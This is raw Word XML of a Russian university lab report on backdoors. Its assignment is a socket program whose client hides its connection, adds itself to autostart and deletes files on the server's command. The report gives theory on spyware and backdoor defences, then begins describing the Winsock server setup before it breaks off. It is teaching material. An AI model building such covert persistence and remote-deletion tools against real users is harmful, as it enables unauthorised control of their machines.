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14C4" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="006A0481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10865F7" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="006A0481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2A3C8881" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="006A0481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F4D732F" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRDefault="00311EBF" w:rsidP="00311EBF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Институт компьютерных наук и кибербезопасности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0948C65E" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="007350A2" w:rsidRDefault="00311EBF" w:rsidP="00311EBF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Высшая школа кибербезопасности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EEB407" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="007350A2" w:rsidRDefault="00311EBF" w:rsidP="00311EBF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</w:p>
    <w:p w14:paraId="2B7D4D02" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRDefault="00311EBF" w:rsidP="00311EBF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00FFFEC0" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="00B57B60" w:rsidRDefault="00311EBF" w:rsidP="00311EBF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77DCC7FD" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="00B57B60" w:rsidRDefault="00311EBF" w:rsidP="00311EBF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF1369C" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="00B57B60" w:rsidRDefault="00311EBF" w:rsidP="00311EBF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC8F43D" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="00B57B60" w:rsidRDefault="00311EBF" w:rsidP="00311EBF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B4E7B7C" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="00B57B60" w:rsidRDefault="00311EBF" w:rsidP="00311EBF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE42E26" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="00B57B60" w:rsidRDefault="00311EBF" w:rsidP="00311EBF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28CB2313" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRDefault="00311EBF" w:rsidP="00311EBF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="140D5D62" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="00B57B60" w:rsidRDefault="00311EBF" w:rsidP="00311EBF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC42508" w14:textId="27F361EF" w:rsidR="00311EBF" w:rsidRPr="00264C16" w:rsidRDefault="00311EBF" w:rsidP="00311EB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123310">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CD9919" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRDefault="00311EBF" w:rsidP="00311EB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4770ADB" w14:textId="74E41542" w:rsidR="00311EBF" w:rsidRPr="00601F8B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05E98">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Защита от встраиваемых потайных ходов</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0481">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E844F0" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="006A0481" w:rsidRDefault="00311EBF" w:rsidP="00311EBF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AA95958" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="006A0481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Pr="00D6222F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0DD55A9D" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRDefault="00311EBF" w:rsidP="00311EBF"/>
    <w:p w14:paraId="4D02041D" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRDefault="00311EBF" w:rsidP="00311EBF"/>
    <w:p w14:paraId="6164A686" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRDefault="00311EBF" w:rsidP="00311EBF"/>
    <w:p w14:paraId="6D554249" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRDefault="00311EBF" w:rsidP="00311EBF"/>
    <w:p w14:paraId="7ADCE207" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRDefault="00311EBF" w:rsidP="00311EBF"/>
    <w:p w14:paraId="06D81BF6" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="00B57B60" w:rsidRDefault="00311EBF" w:rsidP="00311EBF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2BB551C2" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="00B57B60" w:rsidRDefault="00311EBF" w:rsidP="00311EBF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2466DC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133038">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/50002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Прозоров П., Семин А.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660E4B74" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="00B57B60" w:rsidRDefault="00311EBF" w:rsidP="00311EBF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D718206" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRDefault="00311EBF" w:rsidP="00311EBF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695F4B4" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="00B57B60" w:rsidRDefault="00311EBF" w:rsidP="00311EBF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1D94CAC" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="00B57B60" w:rsidRDefault="00311EBF" w:rsidP="00311EBF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</w:t>
      </w:r>
      <w:r w:rsidRPr="00C93DCC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. преподавател</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>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2466DC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Вагисаров В</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002466DC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Б</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585F2D90" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="00C53ADA" w:rsidRDefault="00311EBF" w:rsidP="00311EB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663C74D" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="00B57B60" w:rsidRDefault="00311EBF" w:rsidP="00311EBF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CE1B495" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="006A0481" w:rsidRDefault="00311EBF" w:rsidP="00311EBF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9D98948" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRDefault="00311EBF" w:rsidP="00311EB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97437C4" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRDefault="00311EBF" w:rsidP="00311EB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8C4546" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRDefault="00311EBF" w:rsidP="00311EB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24A7DFF" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRDefault="00311EBF" w:rsidP="00311EB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ED08B4F" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRDefault="00311EBF" w:rsidP="00311EB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7D304A" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRDefault="00311EBF" w:rsidP="00311EB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AB25184" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="006A0481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7BBAD38" w14:textId="1DB5A8CB" w:rsidR="00C93DCC" w:rsidRPr="00311EBF" w:rsidRDefault="00311EBF" w:rsidP="00311EB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6</w:t>
      </w:r>
      <w:r w:rsidR="00C93DCC" w:rsidRPr="00311EBF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F14436" w14:textId="77777777" w:rsidR="00601F8B" w:rsidRPr="0095140C" w:rsidRDefault="00C93DCC" w:rsidP="0095140C">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="0095140C">
        <w:lastRenderedPageBreak/>
        <w:t>Цель работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE79141" w14:textId="0F0EBC57" w:rsidR="00C93DCC" w:rsidRDefault="003D46CC" w:rsidP="003D46CC">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Приобрести навыки по анализу структуры, функциональности и угроз специально встраиваемого дефекта программного продукта – потайного хода (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>backdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>), а также изучить методы защиты от уязвимостей такого вида.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBC2BBA" w14:textId="77777777" w:rsidR="00C93DCC" w:rsidRPr="00C93DCC" w:rsidRDefault="00C93DCC" w:rsidP="0095140C">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>Постановка задачи</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF77009" w14:textId="7DDD034C" w:rsidR="00C93DCC" w:rsidRDefault="0073727C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Реализовать клиент-серверную </w:t>
      </w:r>
      <w:r w:rsidR="006456D8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">программу, использующую сокеты для сетевого соединения. </w:t>
      </w:r>
      <w:r w:rsidR="0038706C" w:rsidRPr="003B2759">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Клиент должен скрыто соединяться с сервером</w:t>
      </w:r>
      <w:r w:rsidR="0038706C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0038706C" w:rsidRPr="003B2759">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>добавляться в автозагрузку и удалять файл, путь к которому поступает с сервера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B91CEF5" w14:textId="77777777" w:rsidR="00C93DCC" w:rsidRPr="00C93DCC" w:rsidRDefault="00C93DCC" w:rsidP="0095140C">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>Теоретические исследования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF3AF37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Программа-шпион (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spyware</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4273">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) — программное обеспечение, скрытно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собирающее информацию о пользователе (персональные данные,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настройки операционной системы, статистику работы и пр.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3895B157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Шпионское программное обеспечение применяется для проведения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маркетинговых исследований, распространения целевой рекламы,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деструктивных воздействий. Информация о пользователе и системе может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существенно упростить последующую компьютерную атаку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C120DC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Шпионские программы распространяются в результате:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491671FC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 xml:space="preserve">посещения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4273">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>-сайтов (для установки шпионских программ активно</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4385D"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 xml:space="preserve">используются </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ActiveX</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4273">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>-компоненты);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1FB71F" w14:textId="77777777" w:rsidR="00F401C8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установки бесплатных и условно-бесплатных программ (например,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4385D"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 xml:space="preserve">кодек </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DivX</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4273">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> содержит утилиту для скрытной загрузки и установки</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4385D"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lang w:val="en-US"/>
        </w:rPr>
        <w:t>SpyWare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F4385D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Gator</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4273">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C113A7" w14:textId="77777777" w:rsidR="00F401C8" w:rsidRPr="00F4385D" w:rsidRDefault="00F401C8" w:rsidP="00F401C8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Большинство шпионских программ не уведомляют об этом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пользователей, эксплуатируя встроенные в программу дефекты потайные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ходы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>backdoor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4385D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) — программные компоненты, специально оставленные или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встроенные в программу с целью скрытого получения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несанкционированного доступа к данным или для удаленного управления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вычислительной системой</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316B4341" w14:textId="69F4B5A6" w:rsidR="00F401C8" w:rsidRPr="00F4385D" w:rsidRDefault="00F401C8" w:rsidP="00A86F01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Категории потайных ходов:</w:t>
      </w:r>
      <w:r w:rsidR="00A86F01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потайные ходы, построенные по технологии клиент-сервер. Такой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потайной ход состоит из двух и более программ — небольшого агента,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скрытно устанавливаемого на компьютер-жертву, и программы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управления на компьютере злоумышленника</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04B16">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="009B708B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 xml:space="preserve">потайные ходы, использующие для </w:t>
      </w:r>
      <w:r w:rsidRPr="00F4385D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">удаленного управления </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4385D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>-,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04B1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web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4385D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">- или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IRC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4385D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>-серверы. Для управления таким потайным ходом не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требуется специальное клиентское программное обеспечение, так как оно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уже входит в состав операционных систем или пакетов прикладных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программ, установленных на компьютерах пользователей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFFD4C0" w14:textId="77777777" w:rsidR="00F401C8" w:rsidRPr="00F4385D" w:rsidRDefault="00F401C8" w:rsidP="00F401C8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Потайной ход, например, позволяет копировать файлы с пораженного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компьютера и на него, получать удаленный доступ к реестру, выполнять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системные операции (перезагрузку системы, создание новых сетевых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 xml:space="preserve">ресурсов, модификацию паролей и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F4385D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>тп</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F4385D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.). Опасность потайных ходов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увеличилась в последнее время в связи с тем, что многие современные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сетевые черви или содержат в себе компоненты, обеспечивающие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срабатывание потайного хода, или устанавливают их после заражения для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последующей эксплуатации. Эти действия позволяют использоват</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ь </w:t>
      </w:r>
      <w:r w:rsidRPr="00F4385D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>компьютер пользователя, устройства Интернета вещей, киберфизические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системы для сканирования сетей, проведения с них массированных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сетевых атак, скрытого сбора информации и телеметрии, а также для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дальнейшего распространения по другим узлам сети.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF24545" w14:textId="10A6F3F8" w:rsidR="00C93DCC" w:rsidRDefault="00F401C8" w:rsidP="00F401C8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В большинстве случаев потайной ход после установки открывает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сетевой порт и ожидает входящего соединения. Соответственно,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основными защитными мерами, направленными на борьбу с угрозами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эксплуатации потайных ходов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4385D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> являются контроль активных процессов и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регулярная проверка сетевых портов. При этом следует учитывать, что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потайные ходы могут маскировать свое присутствие в системе, открывать</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> сетевые порты только в заранее определенное время и самостоятельно инициировать исходящее в соединение с удаленным сервером.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1258449B" w14:textId="77777777" w:rsidR="00C93DCC" w:rsidRPr="00C93DCC" w:rsidRDefault="00C93DCC" w:rsidP="0095140C">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Описание </w:t>
      </w:r>
      <w:r w:rsidR="005F5D88">
        <w:t>решения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC77819" w14:textId="5ADB80AC" w:rsidR="00C93DCC" w:rsidRDefault="0007080D" w:rsidP="00566711">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Клиент-серверное соединение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4829A3F2" w14:textId="3F8592F4" w:rsidR="004B1FAA" w:rsidRDefault="0007080D" w:rsidP="004B1FAA">
      <w:r>
        <w:t>Для реализации данного соединения используются сокеты</w:t>
      </w:r>
      <w:r w:rsidR="00AD24AD">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004B1FAA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD24AD" w:rsidRPr="00AD24AD">
        <w:t>Сокет - название </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tooltip="API" w:history="1">
        <w:r w:rsidR="00AD24AD" w:rsidRPr="00AD24AD">
          <w:t>программного</w:t>
        </w:r>
        <w:r w:rsidR="00C34406">
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="00AD24AD" w:rsidRPr="00AD24AD">
          <w:t>интерфейса</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C34406">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD24AD" w:rsidRPr="00AD24AD">
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidR="00C34406">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD24AD" w:rsidRPr="00AD24AD">
        <w:t>обеспечения обмена данными между </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tooltip="Процесс (информатика)" w:history="1">
        <w:r w:rsidR="00AD24AD" w:rsidRPr="00AD24AD">
          <w:t>процессами</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AD24AD" w:rsidRPr="00AD24AD">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AD24AD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B1FAA">
        <w:t xml:space="preserve">В данном случае клиент при запуске открывает определенный порт и ожидает входящего соединения. Сервер соединяется с клиентом. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32284D04" w14:textId="3A57040C" w:rsidR="004B1FAA" w:rsidRDefault="004B1FAA" w:rsidP="004B1FAA">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Сервер</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5267D60E" w14:textId="5B51BF94" w:rsidR="00405A66" w:rsidRPr="00822A02" w:rsidRDefault="00405A66" w:rsidP="007E2F92">
      <w:r>
        <w:t xml:space="preserve">Для начала создается структура </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WSADATA</w:t>
      </w:r>
      <w:r w:rsidRPr="00405A66">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">с названием </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00405A66">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">которая содержит информацию о реализации сокетов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00405A66">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Функция </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WSAStartup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00405A66">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">указывает на требуемую версию сокетов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00405A66">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и извлекает сведения о конкретной реализации сокетов. Функция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00405A66">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AF</w:t>
      </w:r>
      <w:r w:rsidRPr="00405A66">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INET</w:t>
      </w:r>
      <w:r w:rsidRPr="00405A66">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOCK</w:t>
      </w:r>
      <w:r w:rsidRPr="00405A66">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>STREAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00930160">
        <w:t xml:space="preserve">,0) </w:t>
      </w:r>
      <w:r>
        <w:t>создает сокет сервера</w:t>
      </w:r>
      <w:r w:rsidR="00930160">
        <w:t xml:space="preserve">. Первый параметр этой функции указывает на семейство адресов </w:t>
      </w:r>
      <w:r w:rsidR="00930160">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidR="00930160" w:rsidRPr="00930160">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00930160">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Protocol</w:t>
      </w:r>
      <w:r w:rsidR="00930160" w:rsidRPr="00930160">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00930160">
        <w:t>версии 4 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00930160">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IPv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00930160" w:rsidRPr="00930160">
        <w:t xml:space="preserve">4). </w:t>
      </w:r>
      <w:r w:rsidR="00930160">
        <w:t xml:space="preserve">Второй параметр – это тип сокета, который обеспечивает упорядоченные, двухсторонние потоки байтов на основе соединения с механизмом передачи данных, используется протокол </w:t>
      </w:r>
      <w:r w:rsidR="00930160">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="00930160" w:rsidRPr="00930160">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D916DC">
